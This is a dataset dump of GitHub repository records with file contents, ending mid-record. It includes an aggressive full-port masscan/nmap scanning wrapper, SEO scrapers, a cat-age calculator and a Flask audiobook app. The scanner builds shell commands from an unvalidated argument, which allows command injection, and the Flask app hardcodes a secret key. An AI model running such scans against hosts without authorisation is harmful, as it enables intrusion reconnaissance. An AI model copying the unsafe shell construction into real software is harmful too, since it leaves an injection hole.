repo_name
stringlengths 5
114
| repo_url
stringlengths 24
133
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| branch_name
stringclasses 209
values | visit_date
timestamp[ns] | revision_date
timestamp[ns] | committer_date
timestamp[ns] | github_id
int64 9.83k
683M
⌀ | star_events_count
int64 0
22.6k
| fork_events_count
int64 0
4.15k
| gha_license_id
stringclasses 17
values | gha_created_at
timestamp[ns] | gha_updated_at
timestamp[ns] | gha_pushed_at
timestamp[ns] | gha_language
stringclasses 115
values | files
listlengths 1
13.2k
| num_files
int64 1
13.2k
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
avavav777/masmap
|
https://github.com/avavav777/masmap
|
b92b5c7ea783642c79fd92ced05e99ae00c3b72a
|
bf34df1618aeea6a6f5dd048affe254a601b51f9
|
3bbea33b83e970d27e27a55960a5190de17f14a7
|
refs/heads/master
| 2021-06-12T13:29:45.605873 | 2017-03-21T09:54:29 | 2017-03-21T09:54:29 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5781071782112122,
"alphanum_fraction": 0.6134549379348755,
"avg_line_length": 28.233333587646484,
"blob_id": "f72bf9552d433b83a619cf71c0309c74bb4d366b",
"content_id": "52fca87effe37c66e245769f05c60c84dd2d33dd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 877,
"license_type": "no_license",
"max_line_length": 121,
"num_lines": 30,
"path": "/masmap.py",
"repo_name": "avavav777/masmap",
"src_encoding": "UTF-8",
"text": "# coding=u8\nimport sys,os\n\nip=sys.argv[1]\n\ndef masscan(ip):\n\tfor x in xrange(0,3):\n\t\t# os.system('masscan -p1-65535 --rate=10000 -oL {tmp} {ip}'.format(tmp='/tmp/tmp_result_'+str(x),ip=ip))\n\t\tos.system('/opt/masscan/bin/masscan -p1-65535 --rate=10000 -oG {tmp} {ip}'.format(tmp='/tmp/tmp_result_'+str(x),ip=ip))\n\ndef selectPorts():\n\tos.system('cat /tmp/tmp_result_0 /tmp/tmp_result_1 /tmp/tmp_result_2 | sort | uniq > /tmp/tmp_result')\n\tos.system('sed -i \\'/#/d\\' /tmp/tmp_result')\n\tports=''\n\twith open('/tmp/tmp_result') as f:\n\t\tfor line in f:\n\t\t\tif ports != '':\n\t\t\t\tports += ','\n\t\t\tport = line.split()\n\t\t\tports += port[4].replace('/','').replace('open','').replace('tcp','')\n\treturn ports\n\n\ndef nmap(ip,ports):\n\tos.system('nmap -Pn -T5 -sV -A {ip} -p{ports} -oN result'.format(ip=ip,ports=ports))\n\nif __name__ == '__main__':\n\tmasscan(ip)\n\tports=selectPorts()\n\tnmap(ip,ports)\n"
}
] | 1 |
ckwojai/idk
|
https://github.com/ckwojai/idk
|
460ffe50730b57b3b0c8520a13502f36475ea112
|
80e8ce5514162b7eb58721091a2f7c3543b7f418
|
8ffb0d83254bdd13cb870b3079e68fa3b24f6398
|
refs/heads/master
| 2021-07-10T08:41:47.894144 | 2017-10-09T10:11:14 | 2017-10-09T10:11:14 | 106,259,861 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7473683953285217,
"alphanum_fraction": 0.7473683953285217,
"avg_line_length": 93,
"blob_id": "7fe21999573c28d2e282d3428eeb899482a651e2",
"content_id": "da407fcefcaab7c2d951d987cf78b78972b8cbc2",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 190,
"license_type": "permissive",
"max_line_length": 102,
"num_lines": 2,
"path": "/pk.py",
"repo_name": "ckwojai/idk",
"src_encoding": "UTF-8",
"text": "i don't knwo what i m suppsoed to say but I can just figure it out and hope and pray\ni say her my name and says it's nice to meet ya then she handed me a cup of water, filled with tequila\n\n\n"
}
] | 1 |
davidlares/beautifulsoup-scraping-examples
|
https://github.com/davidlares/beautifulsoup-scraping-examples
|
b1e79194e9ba464df9844638931a251b790a1fe3
|
bab49a099407e2db93c2fd569a4c66ca62c3f81f
|
4c5523db268d68b7b90831adbdeef627bed7e9bd
|
refs/heads/master
| 2021-11-04T12:06:36.500761 | 2019-04-27T23:08:45 | 2019-04-27T23:08:45 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7578616142272949,
"alphanum_fraction": 0.7610062956809998,
"avg_line_length": 31.931034088134766,
"blob_id": "b8f4b0f9078850bb6c8e63a47cfe7673d45715a1",
"content_id": "79b9ac3053d9db73f67a3c011270154eaa40183d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 954,
"license_type": "permissive",
"max_line_length": 219,
"num_lines": 29,
"path": "/README.md",
"repo_name": "davidlares/beautifulsoup-scraping-examples",
"src_encoding": "UTF-8",
"text": "# davidSoup\n\nThis repo contains Python functions with a bunch a different utilities SEO focused, this package could be very useful for SEO common activities such h1 tags counters, keywords presence, size weight, and other functions.\n\nFeel free to use them for any integration of personal project. We use the Python official website for this example, but can apply to any other URL around\n\n## Running script (considering a perfect running env)\n\nSimple: just `python3 seo.py`\nAll the scripts does not have any relation between each other. You can use it in any particular order\n\n## What does this script do evaluates?\n\n\t- Meta Description evaluation\n\t- HTTPS Existance / or HTTP\n\t- Given URL (www presence)\n\t- Site weight\n\t- Stracting the <title> Content tag\n\t- Google Analytics presence\n\t- Site keywords\n\t- Site links and response codes\n\n## Credits\n\n - [David Lares](https://twitter.com/davidlares3)\n\n## License\n\n - [MIT](https://opensource.org/licenses/MIT)"
},
{
"alpha_fraction": 0.6157079339027405,
"alphanum_fraction": 0.6214867234230042,
"avg_line_length": 27.207406997680664,
"blob_id": "46c5046a1a77c207ce79689c8b1cb6dcb856fcb6",
"content_id": "75aa6a5c80bed562cbd2b9433f7903fb4da25596",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3807,
"license_type": "permissive",
"max_line_length": 65,
"num_lines": 135,
"path": "/seo.py",
"repo_name": "davidlares/beautifulsoup-scraping-examples",
"src_encoding": "UTF-8",
"text": "import urllib.request as request\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nimport re\nimport os\n\n# verify https existance\nprint(\"HTTPS EXISTANCE\")\nprint(\"=================================\")\nreq = request.Request('http://python.org')\nresult = request.urlopen(req)\nprint(result.geturl())\nprint(\" \")\n\n# site weight\nprint(\"SITE WEIGHT\")\nprint(\"=================================\")\nurl = \"https://python.org\"\nsite = request.urlopen(url)\nmeta = site.info()\nprint(\"Content-Length (kbs): \", site.headers['content-length'])\nprint(\" \")\n\n# real site weight (disk)\nprint(\"REAL SITE WEIGHT\")\nprint(\"=================================\")\nf = open('out.txt','r')\nprint(\"File on disk: \", len(f.read()))\nf.close()\n\nf = open('out.txt','wb')\nf.write(site.read())\nsite.close()\nf.close()\n\nf = open('out.txt','r')\nprint(\"File on disk after download: \", len(f.read()))\nf.close()\nprint('os.stat().st_size returns: ', os.stat('out.txt').st_size)\nprint(\" \")\n\n# check www url existance\nprint(\"WWW URL EXISTANCE\")\nprint(\"=================================\")\nreq = request.Request('http://python.org')\nres = request.urlopen(req)\nprint(\"Check www: \", res.geturl())\nprint(\" \")\n\n# check meta description < 150 chars\nprint(\"CHECK IF META IS BELOW 150 CHARS\")\nprint(\"=================================\")\nsite = request.urlopen('http://python.org')\nsoup = BeautifulSoup(site,features=\"html.parser\")\ndescription = soup.find('meta', attrs = {'name': 'description'})\nprint(\"Meta description size: \", len(description.get('content')))\nif(len(description.get('content')) < 150):\n\tprint(\"Description is lower than standard\")\nprint(\" \")\n\n# check title\nprint(\"WEBSITE TITLE\")\nprint(\"=================================\")\n\nhtml = request.urlopen('http://python.org')\nsoup = BeautifulSoup(html.read(),features=\"html.parser\")\nprint(\"Title size is: \", len(soup.html.head.title.string))\nprint(\"Title: \", soup.html.head.title.string)\nprint(\" \")\n\n# keywords\nprint(\"WEBSITE KEYWORDS\")\nprint(\"=================================\")\nsite = request.urlopen('http://python.org')\nsoup = BeautifulSoup(site,features=\"html.parser\")\nkeywords = soup.find('meta', attrs = {'name': 'keywords'})\nprint(\"Python.org Keywords: \", keywords.get('content'))\nwords = keywords.get('content').split()\nprint(\"WORD LIST\")\nfor word in words:\n\tprint(word, len(soup.findAll(text = re.compile(word))))\nprint(\" \")\n\n# image\nprint(\"WEBSITE LOGO/IMAGE URL\")\nprint(\"=================================\")\nsite = request.urlopen('http://python.org')\nsoup = BeautifulSoup(site,features=\"html.parser\")\ncount = 1\nfor image in soup.findAll('img'):\n\tprint('Image #{}', count, \": \", image[\"src\"])\n\tcount += 1\nprint(\" \")\n\n# h1 headings\nprint(\"H1 HEADINGS COUNTERS\")\nprint(\"=================================\")\nsite = request.urlopen('http://python.org')\nsoup = BeautifulSoup(site,features=\"html.parser\")\nfor h1 in soup.find_all('h1'):\n\tprint(\"h1 element: \", h1)\nprint('Total (h1s): ', len(soup.find_all('h1')))\nprint(\" \")\n\n# links lists\nprint(\"LINKS LIST\") \nprint(\"=================================\")\nsite = request.urlopen('http://python.org')\nsoup = BeautifulSoup(site,features=\"html.parser\")\nlinks = []\n\n# getting links\nelements = soup.select('a')\nfor element in elements:\n\tlink = element.get('href')\n\tif link.startswith('http'):\n\t\tlinks.append(link) # inserting into a list \nprint(links)\nprint(\" \")\n# checking the url and http status code\nfor link in links[:10]: \n\tcrequest = urlopen(link)\n\tprint(\"Link: \", link, \"Response: \", crequest.code)\nprint(\" \")\n\nprint(\"ANALYTICS CHECKER\")\nprint(\"=================================\")\n# google analytics\nsite = request.urlopen('http://python.org')\nsoup = BeautifulSoup(site, features=\"html.parser\")\nif soup.findAll(text = re.compile('.google-analytics')):\n\tprint('Site have Google Analytics')\nelse:\n\tprint('Do not have Google Analytics')\nprint(\" \")"
}
] | 2 |
shinriyo/mewcalc
|
https://github.com/shinriyo/mewcalc
|
8eb62f67639d94e6d0e9ff597930b1fb9d6da8b0
|
d70781cb31fa8492ecabf032b026576941f17510
|
8dbf5cda5e82da5d6fa8cb1557aec4ad29ae15c4
|
refs/heads/master
| 2021-01-02T22:39:08.916561 | 2016-01-03T23:11:50 | 2016-01-03T23:11:50 | 28,327,440 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5087719559669495,
"alphanum_fraction": 0.5163742899894714,
"avg_line_length": 23.428571701049805,
"blob_id": "18c9cff7d29d49a50d0f604aeb49ec9f3b93b128",
"content_id": "4bdbb9e25191498d7293e8c676cf23ce71741f67",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1888,
"license_type": "permissive",
"max_line_length": 107,
"num_lines": 70,
"path": "/lib/mewcalc/mewcalc/mewcalc.py",
"repo_name": "shinriyo/mewcalc",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom datetime import datetime, date, time\n\n\nclass NonvalidYearException(Exception): # Exceptionを継承\n def __init__(self, value):\n self.value = value\n\n def __str__(self):\n return repr(self.value)\n\n\nclass MewCalc:\n def __init__(self):\n \"\"\"\n 初期化\n \"\"\"\n pass\n\n def calculate_by_year(self, year):\n \"\"\"\n 人間の歳で猫の年齢計算する\n :param year: 人間の歳\n :return: 猫の年齢\n \"\"\"\n if year <= 0:\n raise NonvalidYearException(\"year is not valid\")\n return 24 + (year - 2) * 4\n\n def calculate_human_age(self, born):\n \"\"\"\n 普通に人間的な年齢を計算する\n :param born: date型の日付\n :return: 猫の年齢\n \"\"\"\n today = date.today()\n try:\n birthday = born.replace(year=today.year)\n except ValueError: # raised when birth date is February 29 and the current year is not a leap year\n birthday = born.replace(year=today.year, month=born.month + 1, day=1)\n if birthday > today:\n return today.year - born.year - 1\n else:\n return today.year - born.year\n\n\n def calc_less_than_zero(self, born):\n \"\"\"\n TODO: 2年目までの計算をする\n :param born:\n \"\"\"\n pass\n\n def calculate(self, born):\n \"\"\"\n 猫の年齢を計算する\n :param born:\n :return: 猫の年齢\n \"\"\"\n if type(born) == int:\n return self.calculate_by_year(born)\n else:\n # 人間の年齢計算して\n age = self.calculate_human_age(born)\n if age < 1:\n self.calc_less_than_zero(born)\n # 猫の年齢計算する\n return self.calculate_by_year(age)\n"
},
{
"alpha_fraction": 0.5384615659713745,
"alphanum_fraction": 0.5384615659713745,
"avg_line_length": 23,
"blob_id": "b67fed05b48f1266c1784b91093b04cc15d2805b",
"content_id": "a90f38b76c188ab350d167fffc83208ebf598ff0",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 26,
"license_type": "permissive",
"max_line_length": 23,
"num_lines": 1,
"path": "/lib/__init__.py",
"repo_name": "shinriyo/mewcalc",
"src_encoding": "UTF-8",
"text": "__author__ = 'shinriyo'\n\n\n"
},
{
"alpha_fraction": 0.4862543046474457,
"alphanum_fraction": 0.5206185579299927,
"avg_line_length": 19.421052932739258,
"blob_id": "0ac32301c6c736bf00f86224cbf842529eb5806e",
"content_id": "cbc6bf67a0523af0246743c00402778962cf539a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1196,
"license_type": "permissive",
"max_line_length": 47,
"num_lines": 57,
"path": "/lib/mewcalc/test/test_mewcalc.py",
"repo_name": "shinriyo/mewcalc",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport random\nimport unittest\nfrom lib.mewcalc.mewcalc import MewCalc\n\nfrom datetime import datetime, date, time\n\n\nclass MewCalcTest(unittest.TestCase):\n def setUp(self):\n self.mc = MewCalc()\n\n def test_human_age(self):\n \"\"\"\n 人間の年\n \"\"\"\n born = date(1984, 1, 4)\n res = self.mc.calculate_human_age(born)\n self.assertEqual(res, 30)\n\n def test_cat_age(self):\n \"\"\"\n 猫の年\n \"\"\"\n born = date(1984, 1, 4)\n res = self.mc.calculate(born)\n self.assertEqual(res, 30)\n\n def test_cat_year_age1(self):\n \"\"\"\n 2年は24歳\n \"\"\"\n year = 2\n res = self.mc.calculate_by_year(year)\n self.assertEqual(res, 24)\n\n def test_cat_year_age2(self):\n \"\"\"\n 3年は28歳\n \"\"\"\n year = 3\n res = self.mc.calculate_by_year(year)\n self.assertEqual(res, 24)\n\n def test_cat_year_age3(self):\n \"\"\"\n 19年は92歳\n \"\"\"\n year = 19\n res = self.mc.calculate_by_year(year)\n self.assertEqual(res, 92)\n\n\nif __name__ == '__main__':\n unittest.main()\n"
},
{
"alpha_fraction": 0.6604244709014893,
"alphanum_fraction": 0.6791510581970215,
"avg_line_length": 11.121212005615234,
"blob_id": "5f6142fd0c1eebcb21d82599d9260b9e3f6fd7e3",
"content_id": "898de4dd0fb2d3db16998cf58c1d425ebc78eccf",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1003,
"license_type": "permissive",
"max_line_length": 115,
"num_lines": 66,
"path": "/README.md",
"repo_name": "shinriyo/mewcalc",
"src_encoding": "UTF-8",
"text": "[](https://travis-ci.org/futoase/fizzbuzz)\n\nMew Calc\n====\n\nOverview\n\n## Description\n\n猫の人間の相当年齢を計算する。\n2年目は24歳で、その後4歳ずつ増える。\n[京都中央動物病院猫のQ&Aの年齢計算式](http://kyotochuoah.com/qa/neko_nenrei.html)を参考。\n\n## Demo\n\nN/A\n\n## VS. \n\nN/A\n\n## Requirement\n\nPython 2.7.x\n\n## Usage\n\n### インポート方法\n```\nfrom mewcalc import MewCalc\n```\n\n### 猫の年齢を生まれたdateから計算する\n```\nfrom datetime import datetime, date, time\nmc = MewCalc()\nborn = date(1998, 1, 4)\nres = mc.calculate(born)\n```\n\n### 猫の年齢を年から計算する\n```\nfrom datetime import datetime, date, time\nmc = MewCalc()\nyear = 19\nres = mc.calculate_by_year(year)\n```\n### 注意\n\n2年未満の計算は今後作ります。\n\n## Install\n\n```\npip install mewcalc\n```\n\n## Contribution\n\n## Licence\n\nMIT.\n\n## Author\n\n[shinriyo](https://github.com/shinriyo/)\n\n"
},
{
"alpha_fraction": 0.583106279373169,
"alphanum_fraction": 0.5885558724403381,
"avg_line_length": 27.230770111083984,
"blob_id": "7a14b1d2e9d5766c7feb9e139b0baaf6f590c18d",
"content_id": "7f293a4372876c4eb498d3d287758101a153f1dc",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 367,
"license_type": "permissive",
"max_line_length": 54,
"num_lines": 13,
"path": "/info.py",
"repo_name": "shinriyo/mewcalc",
"src_encoding": "UTF-8",
"text": "# package information.\nINFO = dict(\n name = \"mewcalc\",\n description = \"The calculator fot cat's age\",\n author = \"shinriyo\",\n author_email = \"[email protected]\",\n license = \"MIT License\",\n url = \"https://github.com/shinriyo/mewcalc\",\n classifiers = [\n \"Programming Language :: Python :: 2.7\",\n \"License :: OSI Approved :: MIT License\"\n ]\n)\n"
}
] | 5 |
PetarPeychev/drunk-caves
|
https://github.com/PetarPeychev/drunk-caves
|
0ab69c02771fa5078c08294baec101b39c5d655f
|
b33ca13c5a08a4e188711c127fc32ef8a4053cd4
|
6200ffb653fe008667c2081131ea053f4de8cb9b
|
refs/heads/master
| 2020-07-05T08:43:52.834443 | 2019-08-15T18:49:28 | 2019-08-15T18:49:28 | 202,594,613 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4752851724624634,
"alphanum_fraction": 0.5019011497497559,
"avg_line_length": 17.785715103149414,
"blob_id": "c62e21a4087ea2ed625fd58b1055600bb6a85ab5",
"content_id": "def5dcaf46214979d4b95ee737580361d9ff5bfc",
"detected_licenses": [
"Unlicense"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 263,
"license_type": "permissive",
"max_line_length": 33,
"num_lines": 14,
"path": "/test.py",
"repo_name": "PetarPeychev/drunk-caves",
"src_encoding": "UTF-8",
"text": "from generator import generate\n\nwidth = 40\nheight = 40\n\nmap = generate(width, height, 40)\n\nfor y in range(height):\n for x in range(width):\n if map[x][y] == 1:\n print('#', end = ' ')\n else:\n print(' ', end = ' ')\n print()\n"
},
{
"alpha_fraction": 0.47219982743263245,
"alphanum_fraction": 0.487510085105896,
"avg_line_length": 26.577777862548828,
"blob_id": "58827012e1107c27b96297ea4993184a00c3e6fe",
"content_id": "b185913e179f4e80bea8c80ce38538a08105e72a",
"detected_licenses": [
"Unlicense"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1241,
"license_type": "permissive",
"max_line_length": 62,
"num_lines": 45,
"path": "/generator.py",
"repo_name": "PetarPeychev/drunk-caves",
"src_encoding": "UTF-8",
"text": "import random\n\ndef generate(width, height, percentage):\n map = [[1 for i in range(height)] for j in range(width)]\n\n min_x = 1\n max_x = width - 2\n\n min_y = 1\n max_y = height - 2\n\n x = random.randint(min_x, max_x)\n y = random.randint(min_y, max_y)\n\n map_cells = width * height\n filled_cells = 0\n filled_percentage = 0\n\n previous_delta_x = 0\n previous_delta_y = 0\n\n while filled_percentage <= percentage:\n if map[x][y] == 1:\n map[x][y] = 0\n filled_cells += 1\n filled_percentage = filled_cells / map_cells * 100\n\n if random.choice([True, False]):\n delta_x = random.choice([1, -1, previous_delta_x])\n if x + delta_x < min_x or x + delta_x > max_x:\n x = x - delta_x\n previous_delta_x = -delta_x\n else:\n x = x + delta_x\n previous_delta_x = delta_x\n else:\n delta_y = random.choice([1, -1, previous_delta_y])\n if y + delta_y < min_y or y + delta_y > max_y:\n y = y - delta_y\n previous_delta_y = -delta_y\n else:\n y = y + delta_y\n previous_delta_y = delta_y\n\n return map\n"
},
{
"alpha_fraction": 0.8333333134651184,
"alphanum_fraction": 0.8333333134651184,
"avg_line_length": 41,
"blob_id": "570e5d49091e2431623b942f5fae766deccbca3d",
"content_id": "490aaaf63285d72d2c9e4c764dcd098d86635aef",
"detected_licenses": [
"Unlicense"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 84,
"license_type": "permissive",
"max_line_length": 69,
"num_lines": 2,
"path": "/README.md",
"repo_name": "PetarPeychev/drunk-caves",
"src_encoding": "UTF-8",
"text": "# drunk-caves\nsample of drunkard's walk algorithm for procedural content generation\n"
}
] | 3 |
ralflopez/Audiobook50
|
https://github.com/ralflopez/Audiobook50
|
cf7c5c28b347dc7ded3c8053579d1d5c30d8ba64
|
74a584f1785edbdd8e0d99271459f6c8d59c0bc4
|
c73ed58260d19c6bf327c2b1245c8bc2aff1b8d4
|
refs/heads/main
| 2023-06-14T15:54:09.232606 | 2021-07-09T07:17:21 | 2021-07-09T07:17:21 | 381,249,101 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5549569129943848,
"alphanum_fraction": 0.5549569129943848,
"avg_line_length": 21.634145736694336,
"blob_id": "251bc614ce9be4e0b9a5502455e4c86e108dde33",
"content_id": "e32f796057ab4c2b19e9e43c82e2d29aa3facd8f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 928,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 41,
"path": "/website/models/schema.py",
"repo_name": "ralflopez/Audiobook50",
"src_encoding": "UTF-8",
"text": "user_schema = \"\"\"\n CREATE TABLE users (\n id INTEGER, \n username TEXT NOT NULL, \n hash TEXT NOT NULL, \n PRIMARY KEY(id)\n );\n CREATE UNIQUE INDEX username ON users (username);\n\"\"\"\n\nauthor_schema = \"\"\"\n CREATE TABLE authors (\n id INTEGER,\n name TEXT,\n PRIMARY KEY(id)\n );\n\"\"\"\n\nbook_schema = \"\"\"\n CREATE TABLE books (\n id TEXT UNIQUE NOT NULL,\n title TEXT,\n author_id INTEGER,\n contributor_id INTEGER,\n PRIMARY KEY(id),\n FOREIGN KEY (author_id) REFERENCES authors(id),\n FOREIGN KEY (contributor_id) REFERENCES users(id)\n );\n\"\"\"\n\nsaves_scema = \"\"\"\n CREATE TABLE saves (\n id INTEGER,\n user_id INTEGER,\n book_id INTEGER,\n PRIMARY KEY(id),\n FOREIGN KEY(user_id) REFERENCES users(id),\n FOREIGN KEY(book_id) REFERENCES books(id),\n UNIQUE(user_id, book_id)\n );\n\"\"\"\n"
},
{
"alpha_fraction": 0.4863336384296417,
"alphanum_fraction": 0.4891611635684967,
"avg_line_length": 26.230770111083984,
"blob_id": "2cc25d16a2b2bb0fde23ee536259f73b5e89c5aa",
"content_id": "b8d9c1be3316970221753b7b76f05c115386e531",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1061,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 39,
"path": "/website/packages/SQL/__init__.py",
"repo_name": "ralflopez/Audiobook50",
"src_encoding": "UTF-8",
"text": "import sqlite3\n\nclass SQL:\n def __init__(self, uri):\n self.uri = uri\n \n def execute(self, query_string, *args):\n self.connection = sqlite3.connect(self.uri)\n self.connection.row_factory = self.dict_factory\n self.cursor = self.connection.cursor()\n params = args if len(args) else None\n \n if params:\n try:\n self.cursor.execute(query_string, args)\n rows = self.cursor.fetchall()\n except ValueError:\n print('***************ERRRORROOR*************')\n print(ValueError)\n rows = []\n else:\n try:\n self.cursor.execute(query_string)\n rows = self.cursor.fetchall()\n except:\n rows = []\n\n\n self.connection.commit()\n self.connection.close()\n\n return rows\n \n\n def dict_factory(self, cursor, row):\n d = {}\n for idx, col in enumerate(cursor.description):\n d[col[0]] = row[idx]\n return d"
},
{
"alpha_fraction": 0.41431811451911926,
"alphanum_fraction": 0.42403629422187805,
"avg_line_length": 48.80644989013672,
"blob_id": "b4e22d07b7bbf71cacc43bbbb0c09abfbeca0814",
"content_id": "45315dbe9a438fb30a7f924fafc3d491d14aa0b5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 3087,
"license_type": "no_license",
"max_line_length": 146,
"num_lines": 62,
"path": "/website/templates/profile.html",
"repo_name": "ralflopez/Audiobook50",
"src_encoding": "UTF-8",
"text": "{% extends \"layout.html\" %}\n\n{% block title %}\n Profile\n{% endblock %}\n\n{% block style %}\n <link href=\"{{url_for('static', filename=\"css/card.css\")}}\" rel=\"stylesheet\" />\n <style>#navlink-profile { font-weight: bold }</style>\n{% endblock %}\n\n{% block main%}\n <div class=\"mt-5 pt-5\">\n <div class=\"container\">\n <div class=\"row\">\n <div class=\"col-12\">\n <h2 class=\"text-center mb-3\">Hello, Name</h2>\n <div class=\"text-center mb-4\">\n <form action=\"/logout\" method=\"GET\">\n <button class=\"btn btn-primary mx-auto\">Log Out</button>\n </form>\n </div>\n </div>\n <div class=\"col-6\">\n <h5 class=\"text-center mb-3\">Saved Books</h5>\n {% if saves_list|length > 0 %}\n {% for book in saves_list %}\n <div class=\"card mb-3 {% if book.contributor_id == user_id %}mine{% else %}not-mine{% endif %}\">\n <div class=\"card-body\">\n <h5 class=\"card-title\">{{book.title}}</h5>\n <h6 class=\"card-subtitle mb-4 text-muted\">{{book.author}}</h6>\n <a href=\"book/{{book.id}}\" class=\"card-link text-primary text-decoration-none\">Read / Listen</a>\n <a class=\"card-link text-primary text-decoration-none unsave cursor-pointer\" for=\"{{book.id}}\">Unsave</a>\n </div>\n </div>\n {% endfor %}\n {% endif %}\n </div>\n <div class=\"col-6\">\n <h5 class=\"text-center mb-3\">Contributions</h5>\n {% if contribution_list|length > 0 %}\n {% for book in contribution_list %}\n <div class=\"card mb-3 {% if book.contributor_id == user_id %}mine{% else %}not-mine{% endif %}\">\n <div class=\"card-body\">\n <h5 class=\"card-title\">{{book.title}}</h5>\n <h6 class=\"card-subtitle mb-4 text-muted\">{{book.author}}</h6>\n <a href=\"book/{{book.id}}\" class=\"card-link text-primary text-decoration-none\">Read / Listen</a>\n <a class=\"card-link text-primary text-decoration-none save cursor-pointer\" for=\"{{book.id}}\">Save</a>\n <a class=\"card-link text-primary text-decoration-none delete-book cursor-pointer\" for=\"{{book.id}}\">Delete</a>\n </div>\n </div>\n {% endfor %}\n {% endif %}\n </div>\n </div>\n </div>\n </div>\n{% endblock %}\n\n{% block script %}\n <script src=\"{{url_for('static', filename='js/catalogue/save.js')}}\"></script>\n{% endblock %}"
},
{
"alpha_fraction": 0.6938775777816772,
"alphanum_fraction": 0.7074829936027527,
"avg_line_length": 21.96875,
"blob_id": "94fc1f5afd04b2f01473d85e885a0aaa81046e9d",
"content_id": "f4b3fa24fa08aa5c900dca635c2aae6d756e1d41",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 735,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 32,
"path": "/README.md",
"repo_name": "ralflopez/Audiobook50",
"src_encoding": "UTF-8",
"text": "# Audiobook50\n### https://audiobook50.herokuapp.com/\n### Description:\nAudiobook50 is a website where you can read or listen to audiobooks with transcripts\n\n### Build using:\n* HTML\n* CSS\n* Javascript\n* Flask\n\n### Deployment:\n* [heroku](https://audiobook50.herokuapp.com/)\n\n\n#### API\nIn order to get the transcript from youtube I used a python\nlibrary\n\nYoutube Transcript API\n[youtube-transcript-api](https://pypi.org/project/youtube-transcript-api/)\n\n\n### Run Yourself\n#### Clone repository \n* ```git clone https://github.com/ralflopez/Audiobook50.git```\n#### Make an environment variable\n* Window command: ```python -m venv <name>```\n#### Install dependencies\n* ```pip install -r requirements.txt```\n#### Run app\n* ```python app.py```\n"
},
{
"alpha_fraction": 0.4246987998485565,
"alphanum_fraction": 0.4487951695919037,
"avg_line_length": 26.75,
"blob_id": "53bf03d8c8e57113e4d29c192a834cb5aa5e5ad4",
"content_id": "262dc9aa3171bc0d4186b45b50fa12c31a00e1d8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 332,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 12,
"path": "/website/static/js/book/extra.js",
"repo_name": "ralflopez/Audiobook50",
"src_encoding": "UTF-8",
"text": "$(document).ready(function (){\n let scolling = false\n $(\"#find-current\").click(function (){\n if (!scolling) {\n scolling = true\n $('html').animate({\n scrollTop: $(\"#active\").offset().top\n }, 2000);\n setTimeout(() => scolling = false, 2000)\n }\n });\n});"
},
{
"alpha_fraction": 0.6846985816955566,
"alphanum_fraction": 0.687789797782898,
"avg_line_length": 23.923076629638672,
"blob_id": "5ae5ce203c7bc9d86a0a1ec2729f9cbc145abbe0",
"content_id": "1a413b8b15ded644a305cff23837247ca9665f53",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 647,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 26,
"path": "/website/__init__.py",
"repo_name": "ralflopez/Audiobook50",
"src_encoding": "UTF-8",
"text": "from flask import Flask\nfrom flask.helpers import url_for\nfrom flask_session import Session\nfrom .packages.SQL import SQL\nimport os\n\ndb = SQL(os.path.abspath('website/audiobook50.db'))\n\ndef create_app():\n app = Flask(__name__)\n app.config['SECRET_KEY'] = 'sdfsfsdfas'\n\n # configure session\n app.config['SESSION_PERMANENT'] = False\n app.config['SESSION_TYPE'] = 'filesystem'\n app.config['TEMPLATES_AUTO_RELOAD'] = True\n Session(app)\n\n # register routes\n from .views import views\n from .api import api\n\n app.register_blueprint(views, url_prefix='/')\n app.register_blueprint(api, url_prefix=\"/api\")\n\n return app"
},
{
"alpha_fraction": 0.6309983730316162,
"alphanum_fraction": 0.6309983730316162,
"avg_line_length": 23.849315643310547,
"blob_id": "e69b738fa3211e72b3e80b2a5767f90e539c7b99",
"content_id": "fa71999cd92ef9f5753e7af769d2088847ce47d6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
